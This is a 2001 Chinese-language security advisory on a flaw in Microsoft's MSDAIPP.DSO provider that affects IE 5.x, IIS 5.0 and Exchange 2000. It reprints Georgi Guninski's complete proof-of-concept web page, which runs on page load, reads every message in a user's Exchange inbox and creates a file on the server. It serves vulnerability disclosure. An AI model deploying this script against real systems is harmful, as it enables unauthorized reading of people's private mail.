微软MSDAIPP.DSO脚本接口会导致IE和EXCHANG2000存在漏洞发布时间:2001-03-31 更新时间:2001-03-31 严重程度:高 威胁程度:普通用户访问权限 错误类型:设计错误 利用方式:服务器模式 受影响系统 IE 5.x, IIS 5.0 和Exchange 2000详细描述 Microsoft OLE DB Provider for Internet Publishing" (MSDAIPP.DSO)一般用来 提供脚本接口来访问和管理IIS5.0和WEB存储,其中存在问题它允许连接任意服务程序, 不仅仅是装载当前HTML页面的服务器,但严重的是,此时的IIS5.0在浏览中的IE"本 地 Intranet 区域"安全环境中并不提供任意认证信息给用户。这样就可以通过EMAIL 和恶意站点来以用户的身份来访问用户本地的系统。 通过guninski的分析,只要知道NT DOMAIN上的用户名和IIS5.0的EXCHANGE 2000的 INTRSERVER名字,攻击者就可以获得用户名邮箱中的所有信息并发送到任意服务器上。 测试代码 下面的例程你需要更改INTRASERVER和用户名: --msdaippdemo.html------------------------------------------------------------- <HTML> Written by Georgi Guninski <SCRIPT> function f() { conn=new ActiveXObject("ADODB.Connection"); conn.ConnectionString='Provider=MSDAIPP.DSO.1;Data Source=http://INTRASERVER/exchange/USERNAME/inbox'; //change INTRASERVER and USERNAME with real values rec=new ActiveXObject("ADODB.Record"); conn.Open(); rs=new ActiveXObject("ADODB.Recordset"); rs.Open("SELECT * from SCOPE()",conn); win=window.open("about:blank"); win.document.open(); // DISPLAYS ALL MESSAGES FROM USER'S INBOX while (!rs.EOF) { for(i=0;i<rs.Fields.Count;i++) { win.document.writeln(rs.Fields(i).Name+"="+rs.Fields(i).Value+"<BR>"); } rs.MoveNext(); } rec.Open ("newlycreatedfile.html",conn,3,0); //create file newlycreatedfile.html win.document.close(); } setTimeout("f()",1000); </SCRIPT> </HTML> --------------------------------------------------------------- 解决方案 尚无 相关信息 由Georgi Guninski发现。 |
